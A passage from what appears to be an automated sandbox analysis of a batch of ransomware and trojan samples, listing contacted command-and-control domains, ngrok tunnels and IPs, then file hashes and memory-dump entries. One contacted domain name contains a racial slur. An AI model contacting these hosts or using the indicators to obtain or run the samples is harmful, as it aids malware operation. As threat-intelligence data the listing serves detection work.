| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| KR | 1.234.83.146:11170 | tcp | |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 135.148.139.222:33569 | tcp | |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 158.101.44.242:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| US | 172.67.160.84:443 | freegeoip.app | tcp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | ipbase.com | udp |
| US | 172.67.209.71:443 | ipbase.com | tcp |
| US | 8.8.8.8:53 | 84.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.44.101.158.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.207.131.3.in-addr.arpa | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 192.168.0.100:5552 | tcp | |
| US | 135.148.139.222:33569 | tcp | |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| NL | 81.19.134.39:287 | testdns.ydns.eu | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 135.148.139.222:33569 | tcp | |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| KR | 218.54.30.235:11120 | tcp | |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 135.148.139.222:33569 | tcp | |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| N/A | 192.168.0.100:5552 | tcp | |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 135.148.139.222:33569 | tcp | |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| JP | 133.242.129.155:11120 | tcp | |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 135.148.139.222:33569 | tcp | |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 135.148.139.222:33569 | tcp | |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| N/A | 192.168.0.100:5552 | tcp | |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 135.148.139.222:33569 | tcp | |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:54984 | tcp | |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.131.207.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| N/A | 127.0.0.1:54984 | tcp | |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 135.148.139.222:33569 | tcp | |
| N/A | 127.0.0.1:54984 | tcp | |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 135.148.139.222:33569 | tcp | |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 8.8.8.8:53 | morwye06.top | udp |
| N/A | 192.168.0.100:5552 | tcp | |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 135.148.139.222:33569 | tcp | |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 135.148.139.222:33569 | tcp | |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 135.148.139.222:33569 | tcp | |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 192.168.0.100:5552 | tcp | |
| US | 8.8.8.8:53 | morwye06.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 135.148.139.222:33569 | tcp | |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 135.148.139.222:33569 | tcp | |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| N/A | 127.0.0.1:54984 | tcp | |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| US | 135.148.139.222:33569 | tcp | |
| US | 8.8.8.8:53 | morwye06.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.138.45.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | Alddie7mg.ddns.net | udp |
| US | 8.8.8.8:53 | 170.45.138.3.in-addr.arpa | udp |
| US | 3.138.45.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | bahstardnigga.ddns.net | udp |
| US | 8.8.4.4:53 | bahstardnigga.ddns.net | udp |
| N/A | 192.168.0.100:5552 | tcp | |
| US | 3.138.45.170:12438 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | morwye06.top | udp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zE0F127F87\00462\Win.Ransomware.Azvo-9979243-0-e0b326ecd36bb60605627755c09f87a26ba2a986e21ff06c6a1c8ca1b2368f38.exe
| MD5 | 2f6178aeb84f9bd7d75266e14bc36703 |
| SHA1 | ffef42bdbf9988a3f8796edddeec41d804c6c05d |
| SHA256 | e0b326ecd36bb60605627755c09f87a26ba2a986e21ff06c6a1c8ca1b2368f38 |
| SHA512 | 9666c75096917b2be130affc9710b396535ee8115b1def80ceb4e1dbeb25498f107fcfbd0176047be28ef7569bd2d73f4e293c994d4646c7d6d65bc83d80f143 |
memory/4316-110-0x000002385F4C0000-0x000002385F4E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wzmhmcss.fnn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4316-118-0x000002385F980000-0x000002385F9C4000-memory.dmp
memory/4316-119-0x000002385FA50000-0x000002385FAC6000-memory.dmp
memory/4316-121-0x000002385FA10000-0x000002385FA2E000-memory.dmp
memory/820-124-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-125-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-126-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-136-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-135-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-134-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-133-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-132-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-131-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
memory/820-130-0x000001E99BC80000-0x000001E99BC81000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | 6bd369f7c74a28194c991ed1404da30f |
| SHA1 | 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643 |
| SHA256 | 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d |
| SHA512 | 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | d2fb266b97caff2086bf0fa74eddb6b2 |
| SHA1 | 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d |
| SHA256 | b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a |
| SHA512 | c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Blocker.gen-7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245.exe
| MD5 | f7a5e2a563416a7c2950db32638f171b |
| SHA1 | 579be3f7f767fd3c08534a3510f5a8f4ed1ca053 |
| SHA256 | 7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245 |
| SHA512 | f5d6d744ab7ad3884389e7b26848a2d0c7d5cdf212c8168834b7d9f0aa1e31995f640e22f743b2c53e268b1855f8321861b022675d72497298fb6fa1907a96b7 |
\??\c:\users\admin\desktop\00462\heur-trojan-ransom.win32.blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe
| MD5 | cbacfede45047ab3bf3126c87d584365 |
| SHA1 | 06a4e1bb7e881cefdd9a40eb1b20bd6ec7eaf6ca |
| SHA256 | ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20 |
| SHA512 | 07b93dcb65c7722c9615bee976a877d84507bd1d065387ce5d5f7b9811062bc77701b655cf2235a6cb5c23378e2975a4a0f640886ff8a473333644460b77b7c5 |
memory/3696-158-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe
| MD5 | 29588955e6a92e7735ef3b709af80f80 |
| SHA1 | 275399445c81912394a9db3bdd39c9a1e45cad1c |
| SHA256 | 068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21 |
| SHA512 | 6af1ac3ecb95e8255edbd292b0d6086d6b35ee4cad523ef5e44d565567b1512f27c0adee7048bc7769df3e297154fcce8d17f35364995ab3f1f26564d492a84a |
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe
| MD5 | 8513f15ba5b3d505e77685114cc8dc08 |
| SHA1 | c8cbe6c7964f64aa499abe596e467ccb5e7102d7 |
| SHA256 | bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939 |
| SHA512 | 026c099a938e3ebd645be5f84e36225785798648a7bbd74fbc0a47cef29f0165e1fd9c30640c368748be4ae870ad4fabba33c9582f52c5f3025ffc25ec6799d4 |
memory/2260-164-0x0000000000400000-0x00000000005BB000-memory.dmp
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe
| MD5 | 2608f964ac5cd53d7707fe5c04371250 |
| SHA1 | 35e70686ec6d97171ae226a904fe612c91c5b698 |
| SHA256 | ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14 |
| SHA512 | 16e16c943076fa76ffb3552ccb574da907d37e61a2f3ed33dcf0341c95c0c29130d82cdf31d2640fa50eed714d723ad4792d0f579616033c27e811d9c5bc1da8 |
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
| MD5 | 47e5edda93a308df1efa3827ec5793f4 |
| SHA1 | 65ec29a2e1b59babd58cfdccde5dcb70e4cf3003 |
| SHA256 | abbff25baada14f6f9f371074f65179ec71c18b46739548ec6fa4a78797fae9e |
| SHA512 | 11313f591ceb6025efac174ef0e2b71cb24784b799c0751b799db797636aaa8709df942c12d04d00a0b62f5121e40ac76aef8fec91125fb9b2d14a78e71d6716 |
C:\Program Files\7-Zip\7-zip.chm.exe
| MD5 | a597202636a57ac1871d3b569b90800e |
| SHA1 | b13aebfbcc3e71cdc8208b062d2d0107c6b163ed |
| SHA256 | a9acd0ef647fc502577997b12f17aaa07bcedbf1e22bafcdff7de45b74752682 |
| SHA512 | 8ed7430bca023c4f67f104a81bb63b451189c3e99ec7789fd39b07f5828379f8e17223979ce5ab69e679ccde18160dd9f487f6197f42b2a73aa2517f0227590d |
memory/3696-182-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4852-194-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe
| MD5 | 8adc6e8f063daf91c0f5a1d6ea94e793 |
| SHA1 | 7cca92b95fccc24b4e6d359e8829c3a53120971b |
| SHA256 | 5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a |
| SHA512 | 9e1209409bb6fea179057239ec16e3d87dad31cfc57894227627c19dfa3d0264de55674bf269c4e6d39fafd201f8ca376b16df5c7ac0e9b57acdb98670ba50b1 |
C:\Users\Admin\AppData\Local\Temp\onefile_3144_133728903411204673\python39.dll
| MD5 | 6ea7584918af755ba948a64654a0a61a |
| SHA1 | aa6bfb6f97c37d79e5499b54dc24f753b47f6de0 |
| SHA256 | 3007a651d8d704fc73428899aec8788b8c8c7b150067e31b35bf5a3bd913f9b6 |
| SHA512 | d00e244b7fccdbec67e6b147827c82023dd9cb28a14670d13461462f0fbbe9e3c5b422a5207a3d08484eb2e05986386729a4973023519eb453ee4467f59d4a80 |
C:\Users\Admin\AppData\Local\Temp\onefile_3144_133728903411204673\main.exe
| MD5 | 44d9c9351da96e397dec8eb67ec1f09c |
| SHA1 | 4f06a87e76193fbc9c0c698747905fca2a419233 |
| SHA256 | 97aceb780cab90acf39eded3b9270e47c8b12cd9f6343e006fdeea5dea70e0e2 |
| SHA512 | 77ca224e87fabe650b9c779d9ae95f7d14db0c0a1c12ef486d3c82536218df882fdae3cc8d2182ca950148cf49e575792ff3d477859eb4601e81f17aaeb95529 |
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe
| MD5 | 720783dc09fc172c0983eeb3b489564c |
| SHA1 | 45b80a24e130dd85035949ae2a2f2294def928a6 |
| SHA256 | 70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df |
| SHA512 | 67eb7016f0d41aad36745bc849a1ddee6315c2a1e63c458d50ee40d4ac079dc70f2df0ccd8bece8beb8d6e0344bb215eca7868ca164bd64ce9c297ecdfc28b5e |
memory/452-226-0x0000000000400000-0x000000000047894E-memory.dmp
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-08c273af2b38f8c03028bc1e8f383d784712ff84b7b9c9e421ce1c9213d2e557.exe
| MD5 | 068f9c21ec967cdd4181111f39d8b0a4 |
| SHA1 | e737f3402d6241761fb4a42aac907b9861b191ce |
| SHA256 | 08c273af2b38f8c03028bc1e8f383d784712ff84b7b9c9e421ce1c9213d2e557 |
| SHA512 | b90343900f3ea99b43cc0526516200bcc2eb371008e74754a7c08211108902f993d57781a637c0121c4a20faf7043053d7536f81c70b6bac3e8ddbb128b061fc |
C:\Users\Admin\AppData\Local\Temp\onefile_3144_133728903411204673\vcruntime140.dll
| MD5 | b8ae902fe1909c0c725ba669074292e2 |
| SHA1 | 46524eff65947cbef0e08f97c98a7b750d6077f3 |
| SHA256 | 657ab198c4035ec4b6ff6cf863c2ec99962593547af41b772593715de2df459c |
| SHA512 | 4a70740da0d5cdbd6b3c3869bcf6141cb32c929cb73728bd2044dd16896a3a1cafa28b0714fadcdb265172b62fa113095d379f3a7c16a248e86c8f7f89ecd0f4 |
memory/2876-246-0x0000000000EA0000-0x0000000000EA8000-memory.dmp
memory/1072-251-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1072-248-0x0000000000400000-0x0000000000409000-memory.dmp
memory/2876-247-0x000000001BAD0000-0x000000001C298000-memory.dmp
memory/2876-262-0x000000001C2A0000-0x000000001C2A8000-memory.dmp
